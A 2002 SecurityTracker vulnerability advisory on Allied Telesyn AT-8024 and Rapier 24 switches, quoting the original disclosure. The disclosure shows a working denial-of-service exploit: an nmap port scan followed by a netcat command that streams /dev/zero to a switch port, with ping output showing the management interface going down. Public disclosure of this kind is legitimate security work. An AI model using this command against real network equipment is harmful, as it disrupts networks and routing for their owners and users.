Allied Telesyn Switch Management Ports Allow Remote Users to Deny Service to Those Ports
|
|
SecurityTracker Alert ID: 1005694 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 25 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): AT-8024, Rapier 24
|
Description: A denial of service vulnerability was reported in the Allied Telesyn AT-8024 and Rapier 24 Ethernet switches. A remote user can cause the management ports to temporarily stop responding to traffic.
A remote user can reportedly send a data stream from /dev/zero (\0 characters) to an open port on the switch or, in the case of the
AT-8024 switch, to any port to cause the device to stop responding to that port.
A demonstration exploit command using the netcat
tool is provided:
cat /dev/zero | nc -u 192.168.0.13 Open_Port &
|
Impact: A remote user can cause the management port to stop responding.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.alliedtelesyn.com/allied/products/viewproduct.asp?id=552 (Links to External Site)
|
Cause: Exception handling error
|
Reported By: "Oleg A. Lebedev" <techdir@mns.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 20 Nov 2002 17:13:04 +0300
From: "Oleg A. Lebedev" <techdir@mns.ru>
Subject: Allied Telesyn switches & routers vulnerability
|
Hello, all
The problem: Zero stream DoS switch!
We have tested switches of Allied Telesyn, 8024 and Rapier24. We have
installed the latest firmware from AT site.
Testing:
1. Scan for open ports on switch (assume switch address 192.168.0.13):
nmap -v -sT 192.168.0.13
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Host (192.168.0.103) appears to be up ... good.
Initiating Connect() Scan against (192.168.0.103)
Adding TCP port 23 (state open).
Adding TCP port 80 (state open).
The Connect() Scan took 4 seconds to scan 1542 ports. Interesting ports
on (192.168.0.103): (The 1540 ports scanned but not shown below are in
state: closed)
Port State Service
23/tcp open telnet
80/tcp open http
Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
2. Send stream of zero to open port or any port in case 8024:
cat /dev/zero | nc -u 192.168.0.13 Open_Port &
Pinging 192.168.0.103 with 32 bytes of data:
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Request timed out. // Start sending zero stream: cat /dev/zero | nc -u
192.168.0.103 6789
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out. // Stop sending zero stream
Reply from 192.168.0.103: bytes=32 time=203ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
So, in case of 8024 it stops responding on management interface and in
case Rapier24 it stops management interface access and routing also.
The bug was reported to Allied Telesyn in July...
Best Regards, Oleg A. Lebedev
"Matrix Network Solutions" CIO
|
|
